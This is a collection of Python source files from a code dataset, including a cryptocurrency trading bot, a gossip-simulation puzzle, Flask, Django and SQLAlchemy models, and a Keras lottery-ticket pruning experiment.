1.0005))-1\n response = upbit.buy_limit_order(coin, round(predict_price[0]), available_quantity)\n print(\"예측가 매수 시도\",response)\n buy_price = predict_price[0]\n # if response:\n # # cnt = False\n # if get_balance(coin):\n # _, buy_price = get_balance(coin)\n else:\n available_quantity = int(balance / (current_price * 1.0005))-1\n response = upbit.buy_limit_order(coin, current_price ,available_quantity)\n #response = upbit.buy_market_order(coin, balance-100)\n buy_price = current_price\n print(\"현재가 매수 시도\",response, current_price)\n # if response:\n # # cnt = False\n # buy_price = current_price * 1.0005\n # if get_balance(coin):\n # _, buy_price = get_balance(coin)\n print(\"잔액\", balance)\n\n # 구매 했던 가격보다 가격이 오른 경우 판매해서 이득을 취함\n if round(current_price*0.9995) > buy_price or round(predict_price[0]*0.9995) > buy_price:\n #print(current_price ,buy_price)\n if not cnt:\n real_coin = get_balance(coin[4:])\n if real_coin:\n available_quantity = real_coin[0]\n cancel_order(\"ask\", 3000, current_price)\n if predict_price[0] >= current_price:\n print(\"이득 취하기!!!\")\n print(upbit.sell_limit_order(coin, round(predict_price[0]), available_quantity))\n # print(upbit.sell_market_order(coin, real_coin))\n balance, _ = get_balance(\"KRW\")\n print(\"잔액\", balance)\n # cnt = True\n else:\n print(\"이득 취하기!!!\")\n print(real_coin)\n print(upbit.sell_limit_order(coin, current_price, available_quantity))\n #print(upbit.sell_market_order(coin, real_coin))\n # print(upbit.sell_market_order(coin, real_coin))\n balance, _ = get_balance(\"KRW\")\n print(\"잔액\", balance)\n # cnt = True\n print(\"판매!!!\")\n\n\n loss = 0.992\n\n if current_price < buy_price*loss or predict_price[0] = current_price:\n # response = upbit.sell_limit_order(coin, round(predict_price[0]), available_quantity)\n # print(response)\n # # if response:\n # # cnt = True\n # else:\n cancel_order(\"ask\", 200, current_price)\n try:\n real_coin, _ = get_balance(coin[4:])\n print(upbit.sell_market_order(coin, real_coin))\n except:\n print(upbit.sell_limit_order(coin, current_price, available_quantity))\n #response = upbit.sell_limit_order(coin, current_price, available_quantity)\n #print(response)\n\n if current_price < buy_price*0.95:\n response = upbit.get_order(coin)\n for r in response:\n if r[\"side\"] == 'ask':\n if r['state'] == 'wait':\n print(upbit.cancel_order(r['uuid']))\n try:\n real_coin, _ = get_balance(coin[4:])\n print(upbit.sell_market_order(coin, real_coin))\n except:\n print(upbit.sell_limit_order(coin, current_price, available_quantity))\n # if response:\n # cnt = True\n # response = upbit.get_order(coin)\n # print(response)\n # try:\n # real_coin, _ = get_balance(coin[4:])\n # # print(upbit.sell_market_order(coin, real_coin))\n # except:\n # print(upbit.sell_limit_order(coin, current_price, available_quantity))\n # for r in response:\n # if r[\"side\"] == 'ask':\n # if r['state'] == 'wait':\n # print(\"주문 취소!!\")\n # print(upbit.cancel_order(r['uuid']))\n # try:\n # real_coin, _ = get_balance(coin[4:])\n # print(upbit.sell_market_order(coin, real_coin))\n # except:\n # print(upbit.sell_limit_order(coin, current_price, available_quantity))\n response = upbit.get_order(coin, state=\"done\")\n print(\"완료된 거래\", response)\n print(cnt, current_price, predict_price, avg, balance, \"구매가:\", buy_price)\n wait = upbit.get_order(coin, state=\"wait\")\n print(\"대기 중인 거래\", wait)\n if wait:\n if wait_uuid != wait[0]['uuid']:\n wait_uuid = wait[0]['uuid']\n w.writerow(wait[0])\n if response:\n r = response[0]\n if r[\"side\"] == 'bid':\n cnt = False\n else :\n cnt = True\n if r['ord_type'] !='market':\n buy_price = float(r['price'])\n\n\n time.sleep(0.9)\n\n#print(\"\"balance+ wallet*current_price)\n","sub_path":"real_trade_test2.py","file_name":"real_trade_test2.py","file_ext":"py","file_size_in_byte":9950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"621601721","text":"\"\"\"\r\nAssignment4\r\n\"\"\"\r\nfrom Department import Department\r\nfrom Faculty import Faculty\r\ndef printMenu():\r\n print(\"Choice\\t\\tAction\\n\" + \"------\\t\\t------\\n\" + \"A\\t\\tAdd Department\\n\" + \"D\\t\\tDisplay Department\\n\" + \"Q\\t\\tQuit\\n\" + \"?\\t\\tDisplay Help\\n\\n\")\r\nprintMenu()\r\ndept = Department()\r\nuserIn = input(\"What action would you like to perform?\\n\")\r\nwhile len(userIn) == 1:\r\n userIn = userIn.upper()\r\n if userIn == \"A\":\r\n print(\"Please enter the department information:\\n\")\r\n deptName = input(\"Enter its name:\\n\")\r\n dept.setDeptName(deptName)\r\n numMembers = input(\"Enter its number of members:\\n\")\r\n dept.setNumberOfMembers(int(numMembers))\r\n univ = input(\"Enter its university:\\n\")\r\n dept.setUniversity(univ)\r\n fName = input(\"Enter its faculty's first name:\\n\")\r\n lName = input(\"Enter its faculty's last name:\\n\")\r\n aLevel = input(\"Enter its faculty's academic level:\\n\")\r\n dept.setCurrentFaculty(fName,lName,aLevel)\r\n elif userIn == \"D\":\r\n print(str(dept))\r\n elif userIn == \"Q\":\r\n break\r\n elif userIn == \"?\":\r\n printMenu()\r\n else:\r\n print(\"Unknown action\\n\")\r\n userIn = input(\"What action would you like to perform?\\n\")\r\n \r\n","sub_path":"Assignment 4/Assignment4.py","file_name":"Assignment4.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"518570359","text":"#\r\n# Title: 264 [Intermediate] - Gossiping Bus Drivers\r\n# Author: Vishal Bala\r\n# Date Created: May 25, 2016\r\n# Date Modified: May 25, 2016\r\n# Description: Bus drivers like to gossip, everyone knows that. And bus drivers can gossip when they end up at\r\n# the same stop. So now we are going to calculate after how many stops all the bus drivers know\r\n# all the gossips.\r\n# You will be given a number of busroutes that the drivers follow. Each route is appointed to 1\r\n# driver. When 2 or more drivers are at the same stop (even if it is the start), they can\r\n# exchange all the gossips they know. Each driver starts with one gossip.\r\n# A route looks like this: 1 2 3 4 and is repeated over the whole day like this\r\n# 1 2 3 4 1 2 3 4 1 2 3 ... If a driver starts and stops at the same stop then that is also\r\n# repeated. (e.g. route: 1 2 3 1, day: 1 2 3 1 1 2 3 1 1 2 ...)\r\n# All drivers take 1 minute to go from one stop to another and the gossip exchange happens\r\n# instantly.\r\n# All drivers drive 8 hours a day so you have a maximum of 480 minutes to get all the gossiping\r\n# around.\r\n#\r\n# https://www.reddit.com/r/dailyprogrammer/comments/4gqm90/20160427_challenge_264_intermediate_gossiping_bus/\r\n#\r\n# Modification History:\r\n# NONE\r\n#\r\n# To-do:\r\n# 1) Bonus challenge.\r\n#\r\n#=======================================================================================================================\r\n\r\nclass Driver: # A class to hold all of the data unique to each bus driver\r\n def __init__(self, n, route, gossip, pos, done=False):\r\n self.n = n\r\n self.route = route\r\n self.gossip = gossip\r\n self.pos = pos\r\n self.done = done\r\n\r\n def exchange(self, other):\r\n [self.gossip.append(g) for g in other.gossip]\r\n self.gossip = list(set(self.gossip))\r\n other.gossip = [g for g in self.gossip]\r\n\r\n def move(self, stops):\r\n driver.pos = driver.route[stops % len(driver.route)]\r\n\r\ndrivers = []\r\nf = open('264_INT_input', 'r') # A file containing the routes as outlined on the challenge thread.\r\ni = 1\r\nfor line in f:\r\n r = line.split()\r\n buf = Driver(i, r, [i], r[0])\r\n drivers.append(buf)\r\n i += 1\r\n\r\nup_to_date = False # A boolean to track if all of the bus drivers are up to date on gossip.\r\nfor t in range(480):\r\n others = [driver for driver in drivers]\r\n for driver1 in drivers:\r\n others.remove(driver1)\r\n for driver2 in others:\r\n if driver1.pos == driver2.pos:\r\n driver1.exchange(driver2)\r\n\r\n if len(driver1.gossip) == len(drivers):\r\n driver1.done = True # Driver knows all gossip.\r\n\r\n if all([driver.done for driver in drivers]) & ~up_to_date:\r\n print(\"All drivers up to date after \" + str(t+1) + \" stops.\")\r\n up_to_date = True\r\n WAIT = input(\"Press ENTER to continue.\")\r\n\r\n for driver in drivers:\r\n driver.move(t+1)\r\n\r\nif up_to_date is False:\r\n print(\"Drivers were unable to share gossip with everyone.\")\r\n","sub_path":"264_INT.py","file_name":"264_INT.py","file_ext":"py","file_size_in_byte":3352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"28145551","text":"#splitting male and female classification files into 3 classification files (1 with all shared isoforms, 1 with male specific isoforms and 1 with female specific isoforms)\n#to run script: python3 Sort.by.Sex.Classification.py < output all male specific isoforms> \n#Author: Alice Naftaly, May 2020\n\nimport sys\n\n#read male classification file\n#returns dictionary with key == isoform and value == classification line\ndef read_male_file():\n male_file = sys.argv[1]\n male_dict = {}\n with open(male_file, 'r') as male_class:\n for line in male_class:\n if line.startswith(\"PB\"):\n new_line = line.split()\n isoform = new_line[0]\n male_dict.update({isoform:line})\n return male_dict\n\n\n#read female classification file\n#returns dictionary with key == isoform and value == classification line\ndef read_female_file():\n female_file = sys.argv[2]\n female_dict = {}\n with open(female_file, 'r') as female_class:\n for line in female_class:\n if line.startswith(\"PB\"):\n new_line = line.split()\n isoform = new_line[0]\n female_dict.update({isoform:line})\n return female_dict\n\n#split isoforms into 3 lists\n#returns 3 lists of isoforms (shared, male specific, female specific)\ndef split_isoforms():\n male_dict = read_male_file()\n all_male_isoforms = list(male_dict.keys())\n female_dict = read_female_file()\n all_female_isoforms = list(female_dict.keys())\n shared_isoforms = []\n male_specific_isoforms = []\n female_specific_isoforms = []\n for isoform in all_male_isoforms:\n if isoform in all_female_isoforms:\n shared_isoforms.append(isoform)\n elif isoform not in all_female_isoforms:\n male_specific_isoforms.append(isoform)\n for iso in all_female_isoforms:\n if iso not in all_male_isoforms:\n female_specific_isoforms.append(iso)\n return shared_isoforms, male_specific_isoforms, female_specific_isoforms\n\n#write isoforms to files\ndef write_shared_isoforms():\n shared_isoforms, male_specific_isoforms, female_specific_isoforms = split_isoforms()\n output = sys.argv[3]\n with open(output, 'a') as out:\n for iso in shared_isoforms:\n final = \"%s\\n\" % str(iso)\n out.write(final)\n\n\ndef write_male_specific_isoforms():\n shared_isoforms, male_specific_isoforms, female_specific_isoforms = split_isoforms()\n output = sys.argv[4]\n with open(output, 'a') as out:\n for iso in male_specific_isoforms:\n final = \"%s\\n\" % str(iso)\n out.write(final)\n\n\ndef write_female_specific_isoforms():\n shared_isoforms, male_specific_isoforms, female_specific_isoforms = split_isoforms()\n output = sys.argv[5]\n with open(output, 'a') as out:\n for iso in female_specific_isoforms:\n final = \"%s\\n\" % str(iso)\n out.write(final)\n\n\n#call all functions\ndef call():\n shared = write_shared_isoforms()\n male_specific = write_male_specific_isoforms()\n female_specific = write_female_specific_isoforms()\n\ncall()\n","sub_path":"Sex_Specificity/Sort.by.Sex.Classification.py","file_name":"Sort.by.Sex.Classification.py","file_ext":"py","file_size_in_byte":3257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"86323433","text":"from django.conf.urls import url, include\nfrom . import views\n\nurlpatterns = (\n url(r'^home/', views.home, name='home'),\n url(r'^$', views.post_list, name='post_list'),\n url(r'^login/', views.loginview.as_view(), name='login'),\n url(r'^profile/', views.profile, name='profile'),\n url(r'^post/new/$', views.post_new, name='post_new'),\n url(r'^register/', views.userformview.as_view(), name='register'),\n\n\n\n)\n","sub_path":"mark1/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"385935993","text":"#!usr/bin/env python\n#-*- coding:utf-8 -*-\n\n'''\nTags: Hash Table, Two Pointers, String\nSimilar Problems: Longest Substring with At Most Two Distinct Characters\n'''\n\nclass Solution(object):\n def lengthOfLongestSubstring(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n\n lastRepeating = -1\n maxLen = 0\n dict = {}\n for i in range(len(s)):\n if s[i] in dict and lastRepeating < dict[s[i]]:\n lastRepeating = dict[s[i]]\n if i - lastRepeating > maxLen:\n maxLen = i - lastRepeating\n dict[s[i]] = i\n return maxLen\n\n\nif __name__ == '__main__':\n leng = Solution()\n start = time.time()\n s = 'x'\n print(leng.lengthOfLongestSubstring(s))\n print(time.time() - start)","sub_path":"Leetcode/Python/03. Longest Substring Without Repeating Characters.py","file_name":"03. Longest Substring Without Repeating Characters.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"33527682","text":"\"\"\" mediation model \"\"\"\nfrom datetime import datetime\nfrom flask import current_app as app\nimport os\nfrom pathlib import Path\nfrom sqlalchemy import event\nfrom sqlalchemy.orm import mapper\nimport time\n\n\ndb = app.db\n\n\nclass Mediation(app.model.PcObject,\n db.Model,\n app.model.HasThumbMixin,\n app.model.ProvidableMixin\n ):\n\n id = db.Column(db.BigInteger,\n primary_key=True,\n autoincrement=True)\n\n frontText = db.Column(db.Text, nullable=True)\n\n backText = db.Column(db.Text, nullable=True)\n\n dateCreated = db.Column(db.DateTime,\n nullable=False,\n default=datetime.now)\n\n authorId = db.Column(db.BigInteger,\n db.ForeignKey(\"user.id\"),\n nullable=True)\n\n author = db.relationship(lambda: app.model.User,\n foreign_keys=[authorId],\n backref='mediations')\n\n offererId = db.Column(db.BigInteger,\n db.ForeignKey(\"offerer.id\"),\n nullable=True)\n\n offerer = db.relationship(lambda: app.model.Offerer,\n foreign_keys=[offererId],\n backref='mediations')\n\n eventId = db.Column(db.BigInteger,\n db.ForeignKey(\"event.id\"),\n nullable=True)\n\n event = db.relationship(lambda: app.model.Event,\n foreign_keys=[eventId],\n backref='mediations')\n\n thingId = db.Column(db.BigInteger,\n db.ForeignKey(\"thing.id\"),\n nullable=True)\n\n thing = db.relationship(lambda: app.model.Thing,\n foreign_keys=[thingId],\n backref='mediations')\n\n tutoIndex = db.Column(db.Integer,\n nullable=True,\n index=True)\n\n\nMediation.__table_args__ = (\n db.CheckConstraint('\"thumbCount\" <= 2',\n name='check_mediation_has_max_2_thumbs'),\n db.CheckConstraint('\"thumbCount\" > 0 OR frontText IS NOT NULL',\n name='check_mediation_has_thumb_or_text'),\n db.CheckConstraint('\"eventId\" IS NOT NULL OR thingId IS NOT NULL'\n + ' OR tutoIndex IS NOT NULL',\n name='check_mediation_has_event_or_thing_or_tutoIndex'),\n)\n\n\nTUTOS_PATH = Path(os.path.dirname(os.path.realpath(__file__))) / '..'\\\n / 'static' / 'tuto_mediations'\n\n\ndef upsertTutoMediation(index, has_back=False):\n existing_mediation = Mediation.query.filter_by(tutoIndex=index)\\\n .first()\n mediation = existing_mediation or Mediation()\n mediation.tutoIndex = index\n app.model.PcObject.check_and_save(mediation)\n\n with open(TUTOS_PATH / (str(index) + '.png'), \"rb\") as f:\n mediation.save_thumb(f.read(),\n 0,\n no_convert=True,\n image_type='png')\n\n if has_back:\n with open(TUTOS_PATH / (str(index) + '_verso.png'), \"rb\") as f:\n mediation.save_thumb(f.read(),\n 1,\n no_convert=True,\n image_type='png')\n\n app.model.PcObject.check_and_save(mediation)\n\n\ndef upsertTutoMediations():\n upsertTutoMediation(0)\n upsertTutoMediation(1, True)\n\n\nMediation.upsertTutoMediations = upsertTutoMediations\n\napp.model.Mediation = Mediation\n","sub_path":"models/mediation.py","file_name":"mediation.py","file_ext":"py","file_size_in_byte":3640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"579012710","text":"# Put your persistent store models in this file\n\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import Column, Integer, Float, Text, Date, ForeignKey\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.orm import relationship\n\nfrom .app import MyFirstApp\n\n# DB Engine, sessionmaker and base\nengine = MyFirstApp.get_persistent_store_engine('stream_gage_db')\nSessionMaker = sessionmaker(bind=engine)\nBase = declarative_base()\n\n# SQLAlchemy ORM definition for the stream_gages table\nclass StreamGage(Base):\n '''\n Example SQLAlchemy DB Model\n '''\n __tablename__ = 'stream_gages'\n\n # Columns\n id = Column(Integer, primary_key=True)\n latitude = Column(Float)\n longitude = Column(Float)\n value = Column(Integer)\n\n def __init__(self, latitude, longitude, value):\n \"\"\"\n Constructor for a gage\n \"\"\"\n self.latitude = latitude\n self.longitude = longitude\n self.value = value\n\n\n\nclass model_inputs_table(Base):\n '''\n Example SQLAlchemy DB Model\n '''\n __tablename__ = 'model_inputs_table'\n\n # Columns\n id = Column(Integer, primary_key=True)\n children = relationship(\"model_calibration_table\")\n\n user_name = Column(Text)\n simulation_name = Column(Text)\n simulation_folder = Column(Text)\n cell_size = Column(Float)\n timestep = Column(Float)\n outlet_lat = Column(Float)\n outlet_lon = Column(Float)\n box_topY = Column(Float)\n box_bottomY = Column(Float)\n box_rightX = Column(Float)\n box_leftX = Column(Float)\n simulation_start_date = Column(Date)\n simulation_end_date = Column(Date)\n timeseries_source = Column(Text)\n threshold = Column(Float)\n USGS_gage = Column(Integer)\n\n\n def __init__(self, user_name, simulation_folder, simulation_name, cell_size,timestep,outlet_lat,outlet_lon, box_topY,box_bottomY,\n box_rightX,box_leftX, simulation_start_date, simulation_end_date , timeseries_source, threshold, USGS_gage ):\n \"\"\"\n Constructor for a gage\n \"\"\"\n self.simulation_folder = simulation_folder\n self.user_name = user_name\n self.simulation_name = simulation_name\n self.cell_size = cell_size\n self.timestep = timestep\n self.outlet_lat = outlet_lat\n self.outlet_lon = outlet_lon\n self.box_topY = box_topY\n self.box_bottomY = box_bottomY\n self.box_rightX = box_rightX\n self.box_leftX = box_leftX\n self.simulation_start_date_picker = simulation_start_date\n self.simulation_end_date_picker = simulation_end_date\n self.timeseries_source = timeseries_source\n self.threshold = threshold\n self.USGS_gage = USGS_gage\n\n\n\nclass model_calibration_table(Base):\n '''\n Example SQLAlchemy DB Model\n '''\n __tablename__ = 'model_calibration_table'\n\n # Columns\n id = Column(Integer, primary_key=True)\n\n model_run_id = Column(Integer, ForeignKey('model_inputs_table.id'))\n\n fac_L_form = Column(Float)\n fac_Ks_form = Column(Float)\n fac_n_o_form = Column(Float)\n fac_n_c_form = Column(Float)\n fac_th_s_form = Column(Float)\n\n pvs_t0_form = Column(Float)\n vo_t0_form = Column(Float)\n qc_t0_form = Column(Float)\n kc_form = Column(Float)\n\n\n def __init__(self,model_run_id, fac_L_form,fac_Ks_form, fac_n_o_form, fac_n_c_form,fac_th_s_form ,\n pvs_t0_form,vo_t0_form, qc_t0_form,kc_form ):\n \"\"\"\n Constructor for a gage\n \"\"\"\n self.model_run_id = model_run_id\n self.fac_L_form = fac_L_form\n self.fac_Ks_form = fac_Ks_form\n self.fac_n_o_form = fac_n_o_form\n self.fac_n_c_form = fac_n_c_form\n self.fac_th_s_form = fac_th_s_form\n\n self.pvs_t0_form = pvs_t0_form\n self.vo_t0_form = vo_t0_form\n self.qc_t0_form = qc_t0_form\n self.kc_form = kc_form\n\n\n","sub_path":"tethysapp-my_first_app/tethysapp/my_first_app/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"48"} +{"seq_id":"459122042","text":"\"\"\"\nAn example of how to evaluate a classically trained CNN and a CNN trained using Lottery Ticket pruning.\nThis same can be readily adapted for other models including DNNs.\n\"\"\"\nimport argparse\nimport collections\nimport json\nimport math\nimport os\n\nimport tensorflow.keras as keras\nfrom tensorflow.keras.datasets import cifar10, mnist\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Dropout, Flatten, Conv2D, MaxPooling2D\nfrom tensorflow.keras import backend as K\n\nimport numpy as np\nimport pandas as pd\n\nimport lottery_ticket_pruner\n\n\nclass LoggingCheckpoint(keras.callbacks.Callback):\n \"\"\" A keras checkpoint that is used during training to capture the test and validation losses and accuracies.\n This allows comparison between normal (unpruned) training and lottery ticket pruning on an epoch by epoch basis.\n \"\"\"\n def __init__(self, experiment):\n super().__init__()\n self.reset(experiment)\n\n def on_epoch_end(self, epoch, logs=None):\n super().on_epoch_end(epoch, logs)\n if epoch not in self.epoch_data:\n self.epoch_data[epoch] = collections.OrderedDict()\n self.epoch_data[epoch][self.experiment] = logs\n\n def reset(self, experiment):\n self.experiment = experiment\n self.epoch_data = {}\n\n\nclass Dataset(object):\n def __init__(self, which_set='mnist'):\n # The MNIST and CIFAR10 datasets each have 10 classes\n self.num_classes = 10\n # the data, split between train and test sets\n func_map = {'mnist': self.load_mnist_data,\n 'cifar10': self.load_cifar10_data,\n 'cifar10_reduced_10x': self.load_cifar10_reduced_10x_data}\n if which_set in func_map:\n (x_train, y_train), (x_test, y_test) = func_map[which_set]()\n else:\n raise ValueError('`which_set` must be one of {} but it was {}'.format(func_map.keys(), which_set))\n\n if K.image_data_format() == 'channels_first':\n x_train = x_train.reshape(x_train.shape[0], self.channels, self.img_rows, self.img_cols)\n x_test = x_test.reshape(x_test.shape[0], self.channels, self.img_rows, self.img_cols)\n self.input_shape = (self.channels, self.img_rows, self.img_cols)\n else:\n x_train = x_train.reshape(x_train.shape[0], self.img_rows, self.img_cols, self.channels)\n x_test = x_test.reshape(x_test.shape[0], self.img_rows, self.img_cols, self.channels)\n self.input_shape = (self.img_rows, self.img_cols, self.channels)\n\n x_train = x_train.astype('float32')\n x_test = x_test.astype('float32')\n x_train /= 255\n x_test /= 255\n print('x_train shape:', x_train.shape)\n print(x_train.shape[0], 'train samples')\n print(x_test.shape[0], 'test samples')\n\n # convert class vectors to binary class matrices\n y_train = keras.utils.to_categorical(y_train, self.num_classes)\n y_test = keras.utils.to_categorical(y_test, self.num_classes)\n\n self.x_train, self.y_train, self.x_test, self.y_test = x_train, y_train, x_test, y_test\n\n def load_cifar10_data(self):\n \"\"\" Initialize the instance for training with the full CIFAR dataset.\n :returns The CIFAR dataset divided up into training, testing samples.\n (X train, y train, X test, y test)\n \"\"\"\n # input image dimensions\n self.img_rows, self.img_cols = 32, 32\n self.channels = 3\n\n (x_train, y_train), (x_test, y_test) = cifar10.load_data()\n return (x_train, y_train), (x_test, y_test)\n\n def load_cifar10_reduced_10x_data(self):\n \"\"\" Initialize the instance for training with 1/10th of the samples in the CIFAR dataset.\n :returns 1/10th of the CIFAR dataset divided up into training, testing samples.\n (X train, y train, X test, y test)\n \"\"\"\n (x_train, y_train), (x_test, y_test) = self.load_cifar10_data()\n\n def get_first_n(X, y, classes, n):\n result = []\n # Accumulate the first N samples of each class\n for cls in classes:\n first_n = np.where(y == cls)[0][:n]\n result.extend(first_n)\n # Now put them back into the original order\n result = sorted(result)\n X = X[result]\n y = y[result]\n return X, y\n\n # Reduce overall size of train, test sets by 10x\n x_train, y_train = get_first_n(x_train, y_train, range(self.num_classes),\n x_train.shape[0] // (self.num_classes * 10))\n x_test, y_test = get_first_n(x_test, y_test, range(self.num_classes),\n x_test.shape[0] // (self.num_classes * 10))\n return (x_train, y_train), (x_test, y_test)\n\n def load_mnist_data(self):\n \"\"\" Initialize the instance for training with the MNIST dataset.\n :returns The MNIST dataset divided up into training, testing samples.\n (X train, y train, X test, y test)\n \"\"\"\n # input image dimensions\n self.img_rows, self.img_cols = 28, 28\n self.channels = 1\n (x_train, y_train), (x_test, y_test) = mnist.load_data()\n return (x_train, y_train), (x_test, y_test)\n\n\nclass MNIST(object):\n \"\"\" A class that can be used to create, train and evaluate a model on the MNIST or CIFAR10 datasets.\n \"\"\"\n def __init__(self, experiment, which_set='mnist'):\n self.batch_size = 128\n self.dataset = Dataset(which_set=which_set)\n\n self.experiment = experiment\n self.logging_callback = LoggingCheckpoint(experiment)\n self.callbacks = [self.logging_callback, keras.callbacks.EarlyStopping(patience=3, verbose=1)]\n\n def create_model(self):\n model = Sequential()\n model.add(Conv2D(32, kernel_size=(3, 3),\n activation='relu',\n input_shape=self.dataset.input_shape))\n model.add(Conv2D(64, (3, 3), activation='relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Dropout(0.25))\n model.add(Flatten())\n model.add(Dense(128, activation='relu'))\n model.add(Dropout(0.5))\n model.add(Dense(self.dataset.num_classes, activation='softmax'))\n\n model.compile(loss=keras.losses.categorical_crossentropy,\n optimizer='adadelta',\n # optimizer=keras.optimizers.Adadelta(), this doesn't work across TF 1.x, TF 2.x\n metrics=['accuracy'])\n return model\n\n def fit(self, model, epochs):\n self.logging_callback.reset(self.experiment)\n model.fit(self.dataset.x_train, self.dataset.y_train,\n batch_size=self.batch_size,\n epochs=epochs,\n verbose=1,\n validation_data=(self.dataset.x_test, self.dataset.y_test),\n callbacks=self.callbacks)\n\n def evaluate(self, model):\n loss, accuracy = model.evaluate(self.dataset.x_test, self.dataset.y_test, verbose=0)\n return float(loss), float(accuracy)\n\n def get_epoch_logs(self):\n \"\"\" Returns a dict of each epoch's accuracy, loss, validation accuracy, validation loss.\n result[][]['loss']\n result[][]['acc']\n result[][]['val_loss']\n result[][]['val_acc']\n \"\"\"\n return self.logging_callback.epoch_data\n\n\nclass MNISTPruned(MNIST):\n \"\"\" A class that can be used to create, train and evaluate a model on the MNIST or CIFAR10 datasets.\n When training the model this class will apply lottery ticket pruning after every epoch.\n \"\"\"\n def __init__(self, experiment, pruner, use_dwr=False, which_set='mnist'):\n \"\"\"\n :param experiment: A string that describes the experiment being evaluated.\n :param pruner: A `LotteryTicketPruner` instance that is used to prune the weights after every epoch of training.\n :param use_dwr: If True then the callback will apply Dynamic Weight Rescaling (DWR) to the unpruned weights in\n the model after every epoch.\n See section 5.2, \"Dynamic Weight Rescaling\" of https://arxiv.org/pdf/1905.01067.pdf.\n A quote from that paper describes it best:\n \"For each training iteration and for each layer, we multiply the underlying weights by the ratio of the\n total number of weights in the layer over the number of ones in the corresponding mask.\"\n :param which_set: One of 'mnist', 'cifar10', 'cifar10_reduced_10x'.\n See `evaluate()` for more info on what these mean.\n \"\"\"\n super().__init__(experiment, which_set=which_set)\n self.pruner = pruner\n self.use_dwr = use_dwr\n\n def fit(self, model, epochs):\n callbacks = self.callbacks + [lottery_ticket_pruner.PrunerCallback(self.pruner, use_dwr=self.use_dwr)]\n model.fit(self.dataset.x_train, self.dataset.y_train,\n batch_size=self.batch_size,\n epochs=epochs,\n verbose=1,\n validation_data=(self.dataset.x_test, self.dataset.y_test),\n callbacks=callbacks)\n\n\ndef _merge_epoch_logs(epoch_logs, epoch_logs2):\n \"\"\" Due to using early stopping it's possible that training some models takes more epochs than others.\n So we need to merge the epoch logs (training x validation, loss x accuracy) from across all the epochs.\n \"\"\"\n for epoch, logs_dict in epoch_logs2.items():\n if epoch not in epoch_logs:\n epoch_logs[epoch] = logs_dict\n else:\n epoch_logs[epoch].update(logs_dict)\n return epoch_logs\n\n\ndef _to_floats(d):\n \"\"\" Walk through the dict and make sure all values are floats and not np.float32 or np.float64 since the latter\n cannot be serialized to json.\n \"\"\"\n for k, v in d.items():\n if isinstance(v, dict):\n _to_floats(v)\n elif isinstance(v, (np.float16, np.float32, np.float64)):\n d[k] = float(v)\n\n\ndef evaluate(which_set, prune_strategy, use_dwr, epochs, output_dir):\n \"\"\" Evaluates multiple training approaches:\n A model with randomly initialized weights evaluated with no training having been done\n A model trained from randomly initialized weights\n A model with randomly initialized weights evaluated with no training having been done *but* lottery ticket\n pruning has been done prior to evaluation.\n Several models trained from randomly initialized weights *but* with lottery ticket pruning applied at the\n end of every epoch.\n :param which_set: One of 'mnist', 'cifar10', 'cifar10_reduced_10x'.\n 'mnist' is the standard MNIST data set (70k total images of digits 0-9).\n 'cifar10' is the standard CIFAR10 data set (60k total images in 10 classes, 6k images/class)\n 'cifar10_reduced_10x' is just like 'cifar10' but with the total training, test sets reduced by 10x.\n (6k total images in 10 classes, 600 images/class).\n This is useful for seeing the effects of lottery ticket pruning on a smaller dataset.\n :param prune_strategy: One of the strategies supported by `LotteryTicketPruner.calc_prune_mask()`\n A string indicating how the pruning should be done.\n 'random': Pruning is done randomly across all prunable layers.\n 'smallest_weights': The smallest weights at each prunable layer are pruned. Each prunable layer has the\n specified percentage pruned from the layer's weights.\n 'smallest_weights_global': The smallest weights across all prunable layers are pruned. Some layers may\n have substantially more or less weights than `prune_percentage` pruned from them. But overall,\n across all prunable layers, `prune_percentage` weights will be pruned.\n 'large_final': Keeps the weights that have the largest magnitude from the previously trained model.\n This is 'large_final' as defined in https://arxiv.org/pdf/1905.01067.pdf\n 'large_final': Keeps the weights that have the largest magnitude from the previously trained model.\n This is 'large_final' as defined in https://arxiv.org/pdf/1905.01067.pdf\n :param boolean use_dwr: Whether or not to apply Dynamic Weight Rescaling (DWR) to the unpruned weights in the\n model.\n See section 5.2, \"Dynamic Weight Rescaling\" of https://arxiv.org/pdf/1905.01067.pdf.\n A quote from that paper describes it best:\n \"For each training iteration and for each layer, we multiply the underlying weights by the ratio of the\n total number of weights in the layer over the number of ones in the corresponding mask.\"\n :param epochs: The number of epochs to train the models for.\n :param output_dir: The directory to put output files.\n :returns losses and accuracies for the evaluations. Each are a dict of keyed by experiment name and whose value\n is the loss/accuracy.\n \"\"\"\n losses = {}\n accuracies = {}\n\n experiment = 'MNIST'\n mnist = MNIST(experiment, which_set=which_set)\n model = mnist.create_model()\n starting_weights = model.get_weights()\n\n pruner = lottery_ticket_pruner.LotteryTicketPruner(model)\n\n experiment = 'no_training'\n losses[experiment], accuracies[experiment] = mnist.evaluate(model)\n\n experiment = 'MNIST'\n mnist.fit(model, epochs)\n trained_weights = model.get_weights()\n losses[experiment], accuracies[experiment] = mnist.evaluate(model)\n epoch_logs = mnist.get_epoch_logs()\n pruner.set_pretrained_weights(model)\n\n # Evaluate performance of model with original weights and pruning applied\n num_prune_rounds = 4\n prune_rate = 0.2\n overall_prune_rate = 0.0\n for i in range(num_prune_rounds):\n prune_rate = pow(prune_rate, 1.0 / (i + 1))\n overall_prune_rate = overall_prune_rate + 